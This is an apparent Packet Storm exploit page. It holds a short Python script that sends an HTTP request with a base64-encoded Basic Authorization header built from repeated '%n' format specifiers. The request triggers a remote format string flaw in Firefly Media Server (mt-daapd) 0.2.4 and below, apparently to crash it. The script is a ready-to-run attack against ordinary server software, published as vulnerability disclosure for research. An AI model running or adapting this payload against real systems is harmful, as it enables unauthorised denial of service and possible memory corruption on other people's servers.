Exploit that demonstrates a format string vulnerability in Firefly Media Server versions 0.2.4 and below.
bf82baac7982d36b91e817695b760d0fc94ece66b95c7309f6206425f4e68403#!C:\python25\python25.exe
"""
Advisory : [UPH-07-03]
mt-dappd/Firefly media server remote format string vulnerability
Discovered by nnp
http://www.unprotectedhex.com
"""
import sys
import socket
import base64
if len(sys.argv) != 3:
sys.exit(-1)
fmt_str = base64.b64encode("%n"*16 + ":" + "password")
kill_msg = "GET /xml-rpc?method=stats HTTP/1.1\r\nAuthorization: Basic " \
+ fmt_str + "\r\n\r\n"
host = sys.argv[1]
port = sys.argv[2]
print '[+] Host : ' + host
print '[+] Port : ' + port
print "[+] Sending "
print kill_msg
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, int(port)))
s.send(kill_msg)
s.close()
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed